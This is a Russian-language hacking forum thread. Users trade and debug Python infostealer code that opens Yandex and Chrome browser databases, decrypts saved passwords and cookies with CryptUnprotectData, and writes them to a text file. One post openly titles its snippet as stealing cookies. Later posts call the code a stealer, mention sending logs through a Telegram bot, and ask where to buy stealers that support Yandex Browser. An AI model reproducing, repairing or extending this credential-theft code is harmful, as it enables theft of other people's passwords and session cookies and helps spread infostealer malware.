conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data2.db')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
textyp += url + ' | ' + login + ' | ' + password + '\n'
return textyp
file = open(os.getenv("APPDATA") + '\\yandex_passwords.txt', "w+")#данные
file.write(str(Yandexpass()) + '\n')
file.close()


Укажите на ошибку!!! код вроде выполняется, по крайней мере не выводит ошибку, но где искать пароли??? не могу найти их в папке.. Подскажите что надо делать, чтоб сохранить пароль в указаном месте. Вот что происходит после запуска.
555555.PNG
 

lil_rain

Новичок
Сообщения
3
Реакции
0
0 руб.
Telegram
def Opera_c(): textoc = '\n' + 'Cookies Opera:' + '\n' textoc += 'URL | COOKIE | COOKIE NAME' + '\n' if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'): shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2') conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2') cursor = conn.cursor() cursor.execute("SELECT * from cookies") for result in cursor.fetchall(): cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
Пофикси воруем куки из оперы

Упаковка в архив гавеная - лог будет гавеный.
 

AtlantTan

Новичок
Сообщения
6
Реакции
0
0 руб.
Спасибо большое что ответили. но я не понял не чего. Просто я не програмист и мне не понятно обсолютно все. Могли бы вы подробнее сказать что я делаю не так, и где искать мой пароль. может у меня что то с кодом, или я путь не правильно указываю....
просто в папке appdata нет файла с паролями. код который я пытаюсь использовать выше, могли бы вы посмотреть его? что там не так? (вот как он записан, так я и пытаюсь его запустить, но не чего не происходит, просто сообщение в командной строке "Для продолжения нажмите любую клавишу") ошибок не выдает.
 

AtlantTan

Новичок
Сообщения
6
Реакции
0
0 руб.
Нашол этот файл с паролями... только он в папке : C:\Users\AtlantTan\AppData\Roaming имя файла : yandex_passwords.txt рядом файл chromium.txt

вот его содержимое :
Passwords Yandex:
URL | LOGIN | PASSWORD нет ни одного пароля.

содержимое файла chromium.txt
None
Вообщем нет нечего...

я открыл файл ya Login Data блокнотом, и вижу что сайты и пароли есть.... Может дело в разделителях?
Как я понял эта строка кода сообщает машине в каком виде записана информация и чем она разделена ( textyp += 'URL | LOGIN | PASSWORD' + '\n' )
в Файле Ya Login Data информация разделена по другому.... Другие разделители используются......

Вот пример из файла Ya Login Data:
https://login.XXXXXXXX.com/https://...d39371950-74fc-442c-b446-687be7469b89password{"c":"","e":"","p":"FFqgdsPaCF57T+sJ1eMgUM+iQ/vVnQrHcWCygcSk1wB6tkYcNVmM5GO5","t":[]} строка длинная и снова все повторяется, а в самом конце вообще непонятные символы такого типа: NUL NUL NUL BS BS BS i NUL d NUL e NUL t NUL i NUL mail NUL NUL NUL NUL NUL NUL яяя NUL NUL NUL NUL NUL NUL и т д...

Мне кажется что именно из за структуры записания ссылки и логина с поролем, он не смог считать информацию с файла, соответственно и расшифровать не смог.... да и курсор не факт что в нужное место перемистился......

как мне быть? кто может проверьте код, подскажите мне как его записать...

Может есть другой код? чтоб я в ручную скопировал строку из файла YA Login Data и вставил в код, а он уже расшифрует и сохранит в нужную папку.

Помогайте, ;) сам точно не смогу разобраться(
 

AtlantTan

Новичок
Сообщения
6
Реакции
0
0 руб.
Могу ли я просто скопировать пароль из файла Ya Login Data и вставить его в сам код, и просто дешифровать его?
Если такая возможность есть, напишите код пожалуйста...
Ото у меня уже каша в голове....
 

3xpl01t

Местный
Сообщения
34
Реакции
73
0 руб.
Telegram
Нашол этот файл с паролями... только он в папке : C:\Users\AtlantTan\AppData\Roaming имя файла : yandex_passwords.txt рядом файл chromium.txt

вот его содержимое :
Passwords Yandex:
URL | LOGIN | PASSWORD нет ни одного пароля.

содержимое файла chromium.txt
None
Вообщем нет нечего...

я открыл файл ya Login Data блокнотом, и вижу что сайты и пароли есть.... Может дело в разделителях?
Как я понял эта строка кода сообщает машине в каком виде записана информация и чем она разделена ( textyp += 'URL | LOGIN | PASSWORD' + '\n' )
в Файле Ya Login Data информация разделена по другому.... Другие разделители используются......

Вот пример из файла Ya Login Data:
https://login.XXXXXXXX.com/https://...d39371950-74fc-442c-b446-687be7469b89password{"c":"","e":"","p":"FFqgdsPaCF57T+sJ1eMgUM+iQ/vVnQrHcWCygcSk1wB6tkYcNVmM5GO5","t":[]} строка длинная и снова все повторяется, а в самом конце вообще непонятные символы такого типа: NUL NUL NUL BS BS BS i NUL d NUL e NUL t NUL i NUL mail NUL NUL NUL NUL NUL NUL яяя NUL NUL NUL NUL NUL NUL и т д...

Мне кажется что именно из за структуры записания ссылки и логина с поролем, он не смог считать информацию с файла, соответственно и расшифровать не смог.... да и курсор не факт что в нужное место перемистился......

как мне быть? кто может проверьте код, подскажите мне как его записать...

Может есть другой код? чтоб я в ручную скопировал строку из файла YA Login Data и вставил в код, а он уже расшифрует и сохранит в нужную папку.

Помогайте, ;) сам точно не смогу разобраться(
Ты видимо не совсем понял как это работает, в chromium.txt none, потому что ты не пользовался chromium браузерами, а яндекс в новых версиях браузера изменила хранение паролей, теперь малое кол-во стиллеров поддерживают стил ЯД браузера.
 

lil_rain

Новичок
Сообщения
3
Реакции
0
0 руб.
Telegram
Ты видимо не совсем понял как это работает, в chromium.txt none, потому что ты не пользовался chromium браузерами, а яндекс в новых версиях браузера изменила хранение паролей, теперь малое кол-во стиллеров поддерживают стил ЯД браузера.
Малое... Можешь пожалуйста скинуть продажник на него/них?

И ещё. В коде юзается библиотека telebot. Так при медленном инете лог тупо не отправится)) Кнч я понимаю, этот стиллер не создан для использование в "дикой природе", но всё же, надо делать по красоте)
 
Сверху Снизу